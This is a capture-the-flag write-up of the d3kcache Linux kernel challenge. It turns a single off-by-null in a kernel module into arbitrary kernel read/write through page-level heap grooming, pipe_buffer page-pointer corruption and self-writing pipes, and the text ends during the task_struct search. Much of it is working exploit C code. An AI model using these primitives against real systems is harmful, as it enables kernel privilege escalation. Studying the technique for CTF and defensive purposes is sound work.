Page-level heap feng shui and arbitrary read/write from a single off-by-null, as seen in d3kcache

D3CTF2022-d3kcache

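This challenge was originally filed in my kernel exercise notes, but after studying arttnba3's blog post in depth I realized how much it has to teach.

So I decided to give it a post of its own and go through it properly.

Also, arttnba3 is amazing (tql, orz)!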

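Protections

All the usual protections (KASLR, KPTI, SMAP, SMEP and so on) are enabled.

Beyond that, the config shows that CONFIG_CFI_CLANG is enabled as well.

A quick search turns up the following description: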

This option enables Clang’s forward-edge Control Flow Integrity (CFI) checking, where the compiler injects a runtime check to each indirect function call to ensure the target is a valid function with the correct static type. This restricts possible call targets and makes it more difficult for an attacker to exploit bugs that allow the modification of stored function pointers. More information can be found from Clang’s documentation:

https://clang.llvm.org/docs/ControlFlowIntegrity.html

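In other words, a kernel built with this option gets extra checks around indirect calls, so that indirect function pointers cannot be hijacked.

Put simply, every indirect call is validated at run time: the target has to be a real function whose type matches what the call site expects.

As a result, tables of function pointers are tightly protected. Control-flow hijacking by overwriting a function pointer (an ops table, for example) becomes very hard, because the pointer can no longer be redirected to an arbitrary gadget.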

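Module analysis

The module creates a slab cache whose objects are 2048 bytes.

Through ioctl it implements the usual note operations: add, delete, append and show.

The only interesting part is the append path, which contains an off-by-null.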

if ( a2 == 1300 )
{
    if ( idx <= 0xFuLL && kcache_list[idx].ptr )
    {
        v7 = input_size;
        if ( input_size > 0x800 || input_size + kcache_list[idx].size >= 0x800 )
            v7 = 2048 - kcache_list[idx].size;
        if ( v7 < 0 )
            BUG();
        v8 = (char *)kcache_list[idx].ptr + (unsigned int)kcache_list[idx].size;// append
        v9 = (unsigned int)v7;
        v10 = input_ptr;
        _check_object_size(v8, (unsigned int)v7, 0LL);
        if ( !copy_from_user(v8, v10, v9) )
        {
            v8[v9] = 0;//off-by-null
            v5 = 0LL;
        }
        goto LABEL_2;
    }
    v25 = &unk_837;
LABEL_46:
    printk(v25);
    goto LABEL_2;
}
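To make the arithmetic of the bug concrete, here is a small user-space model of the append path. It is only a sketch: `model_append` and `KCACHE_OBJ_SIZE` are names I made up, and the buffer passed in is assumed to be one 2048-byte object plus one extra byte standing in for the first byte of whatever follows it in memory.

```c
#include <stddef.h>
#include <string.h>

#define KCACHE_OBJ_SIZE 2048  /* object size of the module's cache */

/*
 * Hypothetical model of the append branch shown above.
 * obj       : KCACHE_OBJ_SIZE bytes plus one spare byte (the "neighbour")
 * cur_size  : bytes already stored in the object
 * Returns the index at which the terminating NUL is written.
 */
size_t model_append(unsigned char *obj, size_t cur_size,
                    const unsigned char *src, size_t input_size)
{
    size_t n = input_size;

    /* same clamp as the decompiled code: never copy past the object */
    if (input_size > 0x800 || input_size + cur_size >= 0x800)
        n = KCACHE_OBJ_SIZE - cur_size;

    memcpy(obj + cur_size, src, n);

    /* the terminator goes one byte after the copied data */
    obj[cur_size + n] = 0;
    return cur_size + n;
}
```

When the object is filled completely (8 bytes already stored, 2040 appended, as the exp does later), the copy stays in bounds but the terminator lands at index 2048, which is the first byte past the object.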

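Exploitation idea

A lone off-by-null in the kernel looks hard to exploit.

But if we go through the structures commonly used in kernel pwn, pipe_buffer turns out to be a very good fit.

It can be both read and written, the target of those reads and writes is determined entirely by its page member, and page sits at the very start of the structure.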

/**
 * struct pipe_buffer - a linux kernel pipe buffer
 * @page: the page containing the data for the pipe buffer
 * @offset: offset of data inside the @page
 * @len: length of data inside the @page
 * @ops: operations associated with this buffer. See @pipe_buf_operations.
 * @flags: pipe buffer flags. See above.
 * @private: private data owned by the ops.
 **/
struct pipe_buffer {
    struct page *page;
    unsigned int offset, len;
    const struct pipe_buf_operations *ops;
    unsigned int flags;
    unsigned long private;
};

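Each struct page describes exactly one physical page frame, and each struct page is 0x40 bytes in size.

So if the off-by-null lands on the page field of a pipe_buffer, the lowest byte of that pointer is cleared and two pipe_buffers end up pointing at the same struct page, which means they operate on the same physical page.

However, since struct page entries are 0x40 bytes apart, the lowest byte of a page pointer is one of 0x00, 0x40, 0x80 or 0xc0. There is a 1/4 chance it is already \x00, in which case the write changes nothing, so the hijack only succeeds with probability 3/4.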
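The 3/4 figure can be checked with a few lines of C. This is just an illustration under the assumption of a little-endian 64-bit pointer; the helper names and the sample address used in the usage note are hypothetical.

```c
#include <stdint.h>

#define STRUCT_PAGE_SIZE 0x40ULL  /* sizeof(struct page) as stated above */

/* Effect of a single NUL written over the lowest byte of the pointer. */
uint64_t clear_low_byte(uint64_t page_ptr)
{
    return page_ptr & ~0xffULL;
}

/* How many struct page entries the pointer moved back by (0 means no change). */
unsigned pages_moved(uint64_t page_ptr)
{
    return (unsigned)((page_ptr - clear_low_byte(page_ptr)) / STRUCT_PAGE_SIZE);
}
```

For a made-up base such as 0xffffea0000123400, the four possible pointers in that 256-byte window move back by 0, 1, 2 and 3 entries respectively. Only the first case leaves the pointer unchanged, hence 3 useful outcomes out of 4.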

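Let's set aside the details of getting there for now and keep thinking ahead.

We now have two pipes that control the same physical page. The natural next idea is to use the UAF to leak information and then hijack a function pointer inside some structure.

But remember that the kernel has CFI enabled, so that approach does not work. In this situation, privilege escalation requires a real read/write primitive.

arttnba3 came up with a very neat trick: free one of the two pipes and let the UAF page be reused as a slab page for pipe_buffer.

The other pipe can then read the contents of the UAF page, which include complete page pointers. If we take such a page pointer and write it over the next pipe_buffer on the UAF page, we have built a second UAF.

Next we free one of these two pipes and once more get the page reused as a pipe_buffer slab page.

Unlike the first UAF, this time we know the struct page * of the UAF page, so we can set the page pointer of a pipe_buffer on this UAF page to the struct page of the UAF page itself,

which makes that pipe_buffer point at the page it lives on.

Do the same for a few more pipe_buffers so that they can reset one another, and we have arbitrary read/write. Escalating privileges from there is straightforward.

Implementing the idea

With the idea laid out, let's look at how to implement it.

Building the page-level heap feng shui

I have already covered shaping the page allocator with setsockopt in an earlier post,

so I won't repeat it here.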

~ $ cat /proc/buddyinfo
Node 0, zone      DMA      0      0      0      0      0      1      1      1      0      1
Node 0, zone    DMA32      1      2      1      2      4      1      2      2      6      2

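As we can see, the buddy system is fairly clean right after boot.

There are few low-order free blocks, so a modest number of setsockopt calls is enough to drain them.

This corresponds to the following part of the exp: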

/* spray pages in different size for various usages */
void prepare_pgv_pages(void)
{
    /**
     * We want a more clear and continuous memory there, which require us to
     * make the noise less in allocating order-3 pages.
     * So we pre-allocate the pages for those noisy objects there.
     */
    puts("[*] spray pgv order-0 pages...");
    for (int i = 0; i < PGV_1PAGE_SPRAY_NUM; i++) {
        if (alloc_page(i, 0x1000, 1) < 0) {
            printf("[x] failed to create %d socket for pages spraying!\n", i);
        }
    }

    puts("[*] spray pgv order-2 pages...");
    for (int i = 0; i < PGV_4PAGES_SPRAY_NUM; i++) {
        if (alloc_page(PGV_4PAGES_START_IDX + i, 0x1000 * 4, 1) < 0) {
            printf("[x] failed to create %d socket for pages spraying!\n", i);
        }
    }

    /* spray 8 pages for page-level heap fengshui */
    puts("[*] spray pgv order-3 pages...");
    for (int i = 0; i < PGV_8PAGES_SPRAY_NUM; i++) {
        /* a socket need 1 obj: sock_inode_cache, 19 objs for 1 slub on 4 page*/
        if (i % 19 == 0) {
            free_page(pgv_4pages_start_idx++);
        }

        /* a socket need 1 dentry: dentry, 21 objs for 1 slub on 1 page */
        if (i % 21 == 0) {
            free_page(pgv_1page_start_idx += 2);
        }

        /* a pgv need 1 obj: kmalloc-8, 512 objs for 1 slub on 1 page*/
        if (i % 512 == 0) {
            free_page(pgv_1page_start_idx += 2);
        }

        if (alloc_page(PGV_8PAGES_START_IDX + i, 0x1000 * 8, 1) < 0) {
            printf("[x] failed to create %d socket for pages spraying!\n", i);
        }
    }

    puts("");
}

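After this, later allocations come from contiguous pages split off higher-order blocks. The reason for freeing a page every few iterations in the last loop is the noise each socket produces: to keep those side allocations from breaking up high-order contiguous blocks, we hand back pages allocated earlier for them to use.

The problem we face now is this: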

# name            <active_objs> <num_objs> <objsize> <objperslab> <pagesperslab> : tunables <li>
kcache_jar                   16         16      2048           16              8 : tunables 0 0 0 : slabdata 1 0
kmalloc-cg-1k                94        160      1024           16              4 : tunables 0 0 0 : slabdata 10 0
dma-kmalloc-4k                0          0      4096            8              8 : tunables 0 0 0 : slabdata 0 0

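For page-level heap feng shui to be reliable, both sides should allocate from the same order.

Every slab of the kcache_jar cache takes 8 pages, i.e. order 3.

By default a pipe gets 16 pipe_buffers, 16 × 40 = 640 bytes in total, which is served from kmalloc-cg-1k; when that cache runs out it asks the buddy system for order-2 pages.

To keep the success rate high we need to make both allocate from the same order. kcache_jar obviously cannot be changed,

but pipe_buffer can.

fcntl provides an interface for it: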

long pipe_fcntl(struct file *file, unsigned int cmd, unsigned long arg)
{
    struct pipe_inode_info *pipe;
    long ret;

    pipe = get_pipe_info(file, false);
    if (!pipe)
        return -EBADF;

    __pipe_lock(pipe);

    switch (cmd) {
    case F_SETPIPE_SZ:
        ret = pipe_set_size(pipe, arg);
//...

static long pipe_set_size(struct pipe_inode_info *pipe, unsigned long arg)
{
    //...

    ret = pipe_resize_ring(pipe, nr_slots);

    //...

int pipe_resize_ring(struct pipe_inode_info *pipe, unsigned int nr_slots)
{
    struct pipe_buffer *bufs;
    unsigned int head, tail, mask, n;

    bufs = kcalloc(nr_slots, sizeof(*bufs),
                   GFP_KERNEL_ACCOUNT | __GFP_NOWARN);

We can use this to choose which slab cache the pipe_buffer array is allocated from.
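The mapping from the F_SETPIPE_SZ argument to a kmalloc size class is plain arithmetic, sketched below. The assumptions are mine: sizeof(struct pipe_buffer) is taken as 40 bytes (x86-64), the pipe size is assumed to already be a power-of-two number of pages, and the list of size classes is a simplified one. `pipe_ring_bytes` and `kmalloc_class` are hypothetical helper names, not kernel functions.

```c
#include <stddef.h>

#define PAGE_SZ        0x1000UL
#define PIPE_BUFFER_SZ 40UL  /* assumed sizeof(struct pipe_buffer) on x86-64 */

/* Bytes requested by kcalloc(nr_slots, sizeof(struct pipe_buffer), ...). */
size_t pipe_ring_bytes(size_t pipe_size)
{
    size_t nr_slots = pipe_size / PAGE_SZ;  /* one slot per page of pipe capacity */
    return nr_slots * PIPE_BUFFER_SZ;
}

/* Smallest size class (from a simplified list) that fits the request; 0 if none. */
size_t kmalloc_class(size_t bytes)
{
    static const size_t classes[] = {
        8, 16, 32, 64, 96, 128, 192, 256, 512, 1024, 2048, 4096, 8192
    };

    for (size_t i = 0; i < sizeof(classes) / sizeof(classes[0]); i++) {
        if (bytes <= classes[i])
            return classes[i];
    }
    return 0;
}
```

With these numbers the default 16-page pipe needs 640 bytes (1k class), a 64-page pipe needs 2560 bytes (4k class), and pipes of 0x2000 and 0x4000 bytes need 80 and 160 bytes, which fall into the 96 and 192 classes used later in the exploit.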

int extend_pipe_buffer_to_4k(int start_idx, int nr)
{
    for (int i = 0; i < nr; i++) {
        /* let the pipe_buffer to be allocated on order-3 pages (kmalloc-4k) */
        if (i % 8 == 0) {
            free_page(pgv_8pages_start_idx++);
        }

        /* a pipe_buffer on 1k is for 16 pages, so 4k for 64 pages */
        if (fcntl(pipe_fd[start_idx + i][1], F_SETPIPE_SZ, 0x1000 * 64) < 0) {
            printf("[x] failed to extend %d pipe!\n", start_idx + i);
            return -1;
        }
    }

    return 0;
}

In addition, we sandwich the kcache_jar slab between pipe_buffer slabs to raise the success rate further.

The corresponding exp code:

void corrupting_first_level_pipe_for_page_uaf(void)
{
    char buf[0x1000];

    puts("[*] spray pipe_buffer...");
    for (int i = 0; i < PIPE_SPRAY_NUM; i ++) {

        if (pipe(pipe_fd[i]) < 0) {
            printf("[x] failed to alloc %d pipe!", i);
            err_exit("FAILED to create pipe!");
        }
    }

    /* spray pipe_buffer on order-2 pages, make vul-obj slub around with that.*/

    puts("[*] exetend pipe_buffer...");
    if (extend_pipe_buffer_to_4k(0, PIPE_SPRAY_NUM / 2) < 0) {
        err_exit("FAILED to extend pipe!");
    }

    puts("[*] spray vulnerable 2k obj...");
    free_page(pgv_8pages_start_idx++);
    for (int i = 0; i < KCACHE_NUM; i++) {
        kcache_alloc(i, 8, "arttnba3");
    }

    puts("[*] exetend pipe_buffer...");
    if (extend_pipe_buffer_to_4k(PIPE_SPRAY_NUM / 2, PIPE_SPRAY_NUM / 2) < 0) {
        err_exit("FAILED to extend pipe!");
    }
    .......
    .......
    /* try to trigger cross-cache overflow */
    puts("[*] trigerring cross-cache off-by-null...");
    for (int i = 0; i < KCACHE_NUM; i++) {
        kcache_append(i, KCACHE_SIZE - 8, buf);
    }
    .......
    .......

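That completes the off-by-null step.

First UAF

In the previous step we triggered the off-by-null.

If everything went well, we now hold a page that can be turned into a UAF.

How do we check whether we really got that page?

Before triggering the off-by-null, we first write some marker data into every pipe: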

puts("[*] allocating pipe pages...");
for (int i = 0; i < PIPE_SPRAY_NUM; i++) {
    write(pipe_fd[i][1], "arttnba3", 8);
    write(pipe_fd[i][1], &i, sizeof(int));
    write(pipe_fd[i][1], &i, sizeof(int));
    write(pipe_fd[i][1], &i, sizeof(int));
    write(pipe_fd[i][1], "arttnba3", 8);
    write(pipe_fd[i][1], "arttnba3", 8); /* prevent pipe_release() */
}

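After the off-by-null has fired, we read from every pipe again. If the integer nr read from some pipe differs from the current loop index i, we know that this pipe's pipe_buffer is the one hit by the off-by-null.

pipe[i] is the one hit by the off-by-null (the victim), and pipe[nr] is the original pipe whose page it now overlaps.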

/* checking for cross-cache overflow */
puts("[*] checking for corruption...");
for (int i = 0; i < PIPE_SPRAY_NUM; i++) {
    char a3_str[0x10];
    int nr;

    memset(a3_str, '\0', sizeof(a3_str));
    read(pipe_fd[i][0], a3_str, 8);
    read(pipe_fd[i][0], &nr, sizeof(int));
    if (!strcmp(a3_str, "arttnba3") && nr != i) {
        orig_pid = nr;
        victim_pid = i;
        printf("\033[32m\033[1m[+] Found victim: \033[0m%d "
               "\033[32m\033[1m, orig: \033[0m%d\n\n",
               victim_pid, orig_pid);
        break;
    }
}

if (victim_pid == -1) {
    err_exit("FAILED to corrupt pipe_buffer!");
}

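One might wonder why the loop breaks as soon as the victim is found. Doesn't that risk skipping the read on orig and leaving reads and writes out of step later on?

Because every later operation goes through victim, this is not a concern.


There is one more question, though, and it concerns an extreme case.

If the victim is found at i=0, none of the remaining pipes have been read yet. Wouldn't the reads in the check for the second UAF then go wrong?

So I think it is reasonable not to break even after the victim is found, and to keep going until every pipe has been visited.

Admittedly it hardly matters because the probability is tiny, but I tried removing the break and it does work.

Second UAF

We now have a page that can be UAF'd, and we can read and write everything on it.

First we free this UAF page so that it returns to the buddy system.

Then we use fcntl again to resize the pipe_buffer arrays of the remaining pipes, so that they are reallocated and a new slab picks up exactly this page.

Note that we will need to resize the pipe_buffer arrays once more later, so the size chosen here needs some care: the target cache must use single-page slabs (order 0, since the freed page is a single page), its object size must be at least 80 bytes (two pipe_buffers), and a power-of-two number of pipe_buffer structures must land in exactly that object size.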

kmalloc-cg-192       504    504    192   21    1 : tunables    0    0    0 : slabdata     24   0
kmalloc-cg-96        252    252     96   42    1 : tunables    0    0    0 : slabdata      6   0

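We pick these two caches as targets.

So the size to set this time is 0x2000: two slots, 2 × 40 = 80 bytes, which is served from kmalloc-cg-96.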

void corrupting_second_level_pipe_for_pipe_uaf(void)
{
    size_t buf[0x1000];
    size_t snd_pipe_sz = 0x1000 * (SND_PIPE_BUF_SZ/sizeof(struct pipe_buffer));

    memset(buf, '\0', sizeof(buf));

    /* let the page's ptr at pipe_buffer */
    write(pipe_fd[victim_pid][1], buf, SND_PIPE_BUF_SZ*2 - 24 - 3*sizeof(int));

    /* free orignal pipe's page */
    puts("[*] free original pipe...");
    close(pipe_fd[orig_pid][0]);
    close(pipe_fd[orig_pid][1]);

    /* try to rehit victim page by reallocating pipe_buffer */
    puts("[*] fcntl() to set the pipe_buffer on victim page...");
    for (int i = 0; i < PIPE_SPRAY_NUM; i++) {
        if (i == orig_pid || i == victim_pid) {
            continue;
        }

        if (fcntl(pipe_fd[i][1], F_SETPIPE_SZ, snd_pipe_sz) < 0) {
            printf("[x] failed to resize %d pipe!\n", i);
            err_exit("FAILED to re-alloc pipe_buffer!");
        }
    }
    ....

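Before going further, a quick word on what the offset and len fields of pipe_buffer do.

offset is the position of the unread data within the page.

len is the length of the unread data.

In other words:

  • a read on a pipe starts at offset and returns at most len bytes
  • a write on a pipe starts at offset+len

This is why the exp contains so many operations whose only purpose is to balance reads and writes.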
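A toy model helps to follow that bookkeeping. The sketch below tracks only offset and len for a single buffer and assumes every write is merged into the same page; the real pipe code has more conditions (flags, multiple slots), so treat `buf_model`, `model_read` and `model_write` as hypothetical names for illustration.

```c
#include <stddef.h>

#define PAGE_SZ 0x1000u

/* Only the two bookkeeping fields discussed above. */
struct buf_model {
    unsigned int offset;  /* where the unread data starts */
    unsigned int len;     /* how much unread data there is */
};

/* A read consumes up to n bytes starting at offset. */
size_t model_read(struct buf_model *b, size_t n)
{
    size_t got = n < b->len ? n : b->len;

    b->offset += (unsigned int)got;
    b->len -= (unsigned int)got;
    return got;
}

/* A merged write appends at offset + len; returns the position written to. */
size_t model_write(struct buf_model *b, size_t n)
{
    size_t pos = (size_t)b->offset + b->len;

    if (pos + n > PAGE_SZ)
        return (size_t)-1;  /* would not fit into this page */
    b->len += (unsigned int)n;
    return pos;
}
```

Plugging in the exp's numbers, and assuming SND_PIPE_BUF_SZ is 96 (my inference from the kmalloc-cg-96 target): the 36 marker bytes are written, 12 are read back during the corruption check, 96*2 - 24 - 12 = 156 filler bytes bring the end of data to 192, a read of 96 - 12 = 84 bytes moves offset to 96 (the second object on the page), reading 40 bytes there yields one pipe_buffer, and the next write lands at 192, the start of the third object.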


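Back to the exp. Once reads and writes are balanced, we can read out one complete pipe_buffer structure.

We then write it over the next pipe_buffer, which gives us another UAF.

The affected pipes are then found the same way as before.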

/* read victim page to check whether we've successfully hit it */
read(pipe_fd[victim_pid][0], buf, SND_PIPE_BUF_SZ - 8 - sizeof(int));
read(pipe_fd[victim_pid][0], &info_pipe_buf, sizeof(info_pipe_buf));

printf("\033[34m\033[1m[?] info_pipe_buf->page: \033[0m%p\n"
       "\033[34m\033[1m[?] info_pipe_buf->ops: \033[0m%p\n",
       info_pipe_buf.page, info_pipe_buf.ops);

if ((size_t) info_pipe_buf.page < 0xffff000000000000
    || (size_t) info_pipe_buf.ops < 0xffffffff81000000) {
    err_exit("FAILED to re-hit victim page!");
}

puts("\033[32m\033[1m[+] Successfully to hit the UAF page!\033[0m");
printf("\033[32m\033[1m[+] Got page leak:\033[0m %p\n", info_pipe_buf.page);
puts("");

/* construct a second-level page uaf */
puts("[*] construct a second-level uaf pipe page...");
info_pipe_buf.page = (struct page*) ((size_t) info_pipe_buf.page + 0x40);
write(pipe_fd[victim_pid][1], &info_pipe_buf, sizeof(info_pipe_buf));

for (int i = 0; i < PIPE_SPRAY_NUM; i++) {
    int nr;

    if (i == orig_pid || i == victim_pid) {
        continue;
    }

    read(pipe_fd[i][0], &nr, sizeof(nr));
    if (nr < PIPE_SPRAY_NUM && i != nr) {
        snd_orig_pid = nr;
        snd_vicitm_pid = i;
        printf("\033[32m\033[1m[+] Found second-level victim: \033[0m%d "
               "\033[32m\033[1m, orig: \033[0m%d\n",
               snd_vicitm_pid, snd_orig_pid);
        break;
    }
}

if (snd_vicitm_pid == -1) {
    err_exit("FAILED to corrupt second-level pipe_buffer!");
}

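Note this line:

info_pipe_buf.page = (struct page*) ((size_t) info_pipe_buf.page + 0x40);

arttnba3 adds 0x40 to the page pointer before writing it into the next pipe_buffer.

I think this is unnecessary, and it actually makes the code harder to follow. Were it not for freelist randomization (random_list), the page of the next pipe_buffer might even already be exactly the leaked page pointer + 0x40.

So this line can be dropped entirely. I compiled the exp without it and the exploit still succeeded, which confirms my guess.

Building self-writing pipes

We now have the struct page pointer that corresponds to the second UAF page,

and we can write the pipe_buffer structures on that page at will.

So we can make a pipe_buffer on it point at the page it lives on, and thereby control the pipe_buffer itself.

Here we need to control three pipe_buffers.

From low to high address, let's call them A, B and C,

where:

  • A performs the arbitrary read/write
  • C controls where A reads and writes; after writing A it moves on and writes B so that B points at C
  • B resets C so that it points at A again

Obtaining these three pipe_buffers works much like the previous two steps, so I won't go into detail.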

void building_self_writing_pipe(void)
{
    size_t buf[0x1000];
    size_t trd_pipe_sz = 0x1000 * (TRD_PIPE_BUF_SZ/sizeof(struct pipe_buffer));
    struct pipe_buffer evil_pipe_buf;
    struct page *page_ptr;

    memset(buf, 0, sizeof(buf));

    /* let the page's ptr at pipe_buffer */
    write(pipe_fd[snd_vicitm_pid][1], buf, TRD_PIPE_BUF_SZ - 24 -3*sizeof(int));

    /* free orignal pipe's page */
    puts("[*] free second-level original pipe...");
    close(pipe_fd[snd_orig_pid][0]);
    close(pipe_fd[snd_orig_pid][1]);

    /* try to rehit victim page by reallocating pipe_buffer */
    puts("[*] fcntl() to set the pipe_buffer on second-level victim page...");
    for (int i = 0; i < PIPE_SPRAY_NUM; i++) {
        if (i == orig_pid || i == victim_pid
            || i == snd_orig_pid || i == snd_vicitm_pid) {
            continue;
        }

        if (fcntl(pipe_fd[i][1], F_SETPIPE_SZ, trd_pipe_sz) < 0) {
            printf("[x] failed to resize %d pipe!\n", i);
            err_exit("FAILED to re-alloc pipe_buffer!");
        }
    }

    /* let a pipe->bufs pointing to itself */
    puts("[*] hijacking the 2nd pipe_buffer on page to itself...");
    evil_pipe_buf.page = info_pipe_buf.page;
    evil_pipe_buf.offset = TRD_PIPE_BUF_SZ;
    evil_pipe_buf.len = TRD_PIPE_BUF_SZ;
    evil_pipe_buf.ops = info_pipe_buf.ops;
    evil_pipe_buf.flags = info_pipe_buf.flags;
    evil_pipe_buf.private = info_pipe_buf.private;

    write(pipe_fd[snd_vicitm_pid][1], &evil_pipe_buf, sizeof(evil_pipe_buf));

    /* check for third-level victim pipe */
    for (int i = 0; i < PIPE_SPRAY_NUM; i++) {
        if (i == orig_pid || i == victim_pid
            || i == snd_orig_pid || i == snd_vicitm_pid) {
            continue;
        }

        read(pipe_fd[i][0], &page_ptr, sizeof(page_ptr));
        if (page_ptr == evil_pipe_buf.page) {
            self_2nd_pipe_pid = i;
            printf("\033[32m\033[1m[+] Found self-writing pipe: \033[0m%d\n",
                   self_2nd_pipe_pid);
            break;
        }
    }

    if (self_2nd_pipe_pid == -1) {
        err_exit("FAILED to build a self-writing pipe!");
    }

    /* overwrite the 3rd pipe_buffer to this page too */
    puts("[*] hijacking the 3rd pipe_buffer on page to itself...");
    evil_pipe_buf.offset = TRD_PIPE_BUF_SZ;
    evil_pipe_buf.len = TRD_PIPE_BUF_SZ;

    write(pipe_fd[snd_vicitm_pid][1],buf,TRD_PIPE_BUF_SZ-sizeof(evil_pipe_buf));
    write(pipe_fd[snd_vicitm_pid][1], &evil_pipe_buf, sizeof(evil_pipe_buf));

    /* check for third-level victim pipe */
    for (int i = 0; i < PIPE_SPRAY_NUM; i++) {
        if (i == orig_pid || i == victim_pid
            || i == snd_orig_pid || i == snd_vicitm_pid
            || i == self_2nd_pipe_pid) {
            continue;
        }

        read(pipe_fd[i][0], &page_ptr, sizeof(page_ptr));
        if (page_ptr == evil_pipe_buf.page) {
            self_3rd_pipe_pid = i;
            printf("\033[32m\033[1m[+] Found another self-writing pipe:\033[0m"
                   "%d\n", self_3rd_pipe_pid);
            break;
        }
    }

    if (self_3rd_pipe_pid == -1) {
        err_exit("FAILED to build a self-writing pipe!");
    }

    /* overwrite the 4th pipe_buffer to this page too */
    puts("[*] hijacking the 4th pipe_buffer on page to itself...");
    evil_pipe_buf.offset = TRD_PIPE_BUF_SZ;
    evil_pipe_buf.len = TRD_PIPE_BUF_SZ;

    write(pipe_fd[snd_vicitm_pid][1],buf,TRD_PIPE_BUF_SZ-sizeof(evil_pipe_buf));
    write(pipe_fd[snd_vicitm_pid][1], &evil_pipe_buf, sizeof(evil_pipe_buf));

    /* check for third-level victim pipe */
    for (int i = 0; i < PIPE_SPRAY_NUM; i++) {
        if (i == orig_pid || i == victim_pid
            || i == snd_orig_pid || i == snd_vicitm_pid
            || i == self_2nd_pipe_pid || i== self_3rd_pipe_pid) {
            continue;
        }

        read(pipe_fd[i][0], &page_ptr, sizeof(page_ptr));
        if (page_ptr == evil_pipe_buf.page) {
            self_4th_pipe_pid = i;
            printf("\033[32m\033[1m[+] Found another self-writing pipe:\033[0m"
                   "%d\n", self_4th_pipe_pid);
            break;
        }
    }

    if (self_4th_pipe_pid == -1) {
        err_exit("FAILED to build a self-writing pipe!");
    }

    puts("");
}

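Arbitrary read/write

The roles of A, B and C were described above (in the code they are the 2nd, 3rd and 4th pipes). Here is the initial setup: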

void setup_evil_pipe(void)
{
    /* init the initial val for 2nd,3rd and 4th pipe, for recovering only */
    memcpy(&evil_2nd_buf, &info_pipe_buf, sizeof(evil_2nd_buf));
    memcpy(&evil_3rd_buf, &info_pipe_buf, sizeof(evil_3rd_buf));
    memcpy(&evil_4th_buf, &info_pipe_buf, sizeof(evil_4th_buf));

    evil_2nd_buf.offset = 0;
    evil_2nd_buf.len = 0xff0;

    /* hijack the 3rd pipe pointing to 4th */
    evil_3rd_buf.offset = TRD_PIPE_BUF_SZ * 3;
    evil_3rd_buf.len = 0;
    write(pipe_fd[self_4th_pipe_pid][1], &evil_3rd_buf, sizeof(evil_3rd_buf));

    evil_4th_buf.offset = TRD_PIPE_BUF_SZ;
    evil_4th_buf.len = 0;
}

The actual arbitrary read/write wrappers:

void arbitrary_read_by_pipe(struct page *page_to_read, void *dst)
{
    /* page to read */
    evil_2nd_buf.offset = 0;
    evil_2nd_buf.len = 0x1ff8;
    evil_2nd_buf.page = page_to_read;

    /* hijack the 4th pipe pointing to 2nd pipe */
    write(pipe_fd[self_3rd_pipe_pid][1], &evil_4th_buf, sizeof(evil_4th_buf));

    /* hijack the 2nd pipe for arbitrary read */
    write(pipe_fd[self_4th_pipe_pid][1], &evil_2nd_buf, sizeof(evil_2nd_buf));
    write(pipe_fd[self_4th_pipe_pid][1],
          temp_zero_buf,
          TRD_PIPE_BUF_SZ-sizeof(evil_2nd_buf));

    /* hijack the 3rd pipe to point to 4th pipe */
    write(pipe_fd[self_4th_pipe_pid][1], &evil_3rd_buf, sizeof(evil_3rd_buf));

    /* read out data */
    read(pipe_fd[self_2nd_pipe_pid][0], dst, 0xfff);
}

void arbitrary_write_by_pipe(struct page *page_to_write, void *src, size_t len)
{
    /* page to write */
    evil_2nd_buf.page = page_to_write;
    evil_2nd_buf.offset = 0;
    evil_2nd_buf.len = 0;

    /* hijack the 4th pipe pointing to 2nd pipe */
    write(pipe_fd[self_3rd_pipe_pid][1], &evil_4th_buf, sizeof(evil_4th_buf));

    /* hijack the 2nd pipe for arbitrary write */
    write(pipe_fd[self_4th_pipe_pid][1], &evil_2nd_buf, sizeof(evil_2nd_buf));
    write(pipe_fd[self_4th_pipe_pid][1],
          temp_zero_buf,
          TRD_PIPE_BUF_SZ - sizeof(evil_2nd_buf));

    /* hijack the 3rd pipe to point to 4th pipe */
    write(pipe_fd[self_4th_pipe_pid][1], &evil_3rd_buf, sizeof(evil_3rd_buf));

    /* write data into dst page */
    write(pipe_fd[self_2nd_pipe_pid][1], src, len);
}

Leaking information

We now have arbitrary read/write.

Leaking kernel text

/**
 * KASLR's granularity is 256MB, and pages of size 0x1000000 is 1GB MEM,
 * so we can simply get the vmemmap_base like this in a SMALL-MEM env.
 * For MEM > 1GB, we can just find the secondary_startup_64 func ptr,
 * which is located on physmem_base + 0x9d000, i.e., vmemmap_base[156] page.
 * If the func ptr is not there, just vmemmap_base -= 256MB and do it again.
 */
vmemmap_base = (size_t) info_pipe_buf.page & 0xfffffffff0000000;
for (;;) {
    arbitrary_read_by_pipe((struct page*) (vmemmap_base + 157 * 0x40), buf);

    if (buf[0] > 0xffffffff81000000 && ((buf[0] & 0xfff) == 0x070)) {
        kernel_base = buf[0] - 0x070;
        kernel_offset = kernel_base - 0xffffffff81000000;
        printf("\033[32m\033[1m[+] Found kernel base: \033[0m0x%lx\n"
               "\033[32m\033[1m[+] Kernel offset: \033[0m0x%lx\n",
               kernel_base, kernel_offset);
        break;
    }

    vmemmap_base -= 0x10000000;
}
printf("\033[32m\033[1m[+] vmemmap_base:\033[0m 0x%lx\n\n", vmemmap_base);

0x9d000/0x1000=157

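As for the comment at the top, maybe I am just not reading it correctly, but as far as I can tell something seems off.

arttnba3 says that KASLR has a granularity of 256MB, yet the 0x1000000 in "and pages of size 0x1000000 is 1GB MEM" is clearly not 256MB, and neither the code that follows nor "just vmemmap_base -= 256MB" matches that number.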
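One possible way to reconcile the numbers, offered as my own interpretation and not something stated by the exploit author: 0x1000000 could be the size in bytes of the struct page array that describes 1GB of RAM, not a KASLR step. The arithmetic below checks that reading; `vmemmap_span` and `guess_vmemmap_base` are hypothetical helper names.

```c
#include <stdint.h>

#define PAGE_SZ        0x1000ULL
#define STRUCT_PAGE_SZ 0x40ULL

/* Bytes of struct page entries needed to describe mem_bytes of physical memory. */
uint64_t vmemmap_span(uint64_t mem_bytes)
{
    return mem_bytes / PAGE_SZ * STRUCT_PAGE_SZ;
}

/* The exploit's first guess: round a leaked struct page pointer down to 256MB. */
uint64_t guess_vmemmap_base(uint64_t leaked_page)
{
    return leaked_page & 0xfffffffff0000000ULL;
}
```

Under this reading, 1GB of RAM needs 0x1000000 bytes (16MB) of struct page entries, far less than one 256MB window, so masking the leak gives the base directly on a small machine. Only at 16GB does the array itself reach 256MB, which would be where the step-back loop of 0x10000000 becomes necessary.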


Next we search memory for our task_struct.

prctl(PR_SET_NAME, "arttnba3pwnn");

/**
 * For a machine with MEM less than 256M, we can simply get the:
 *      page_offset_base = heap_leak & 0xfffffffff0000000;
 * But that's not always accurate, especially on a machine with MEM > 256M.
 * So we need to find another way to calculate the page_offset_base.
 *
 * Luckily the task_struct::ptraced points to itself, so we can get the
 * page_offset_base by vmemmap and current task_struct as we know the page.
 *
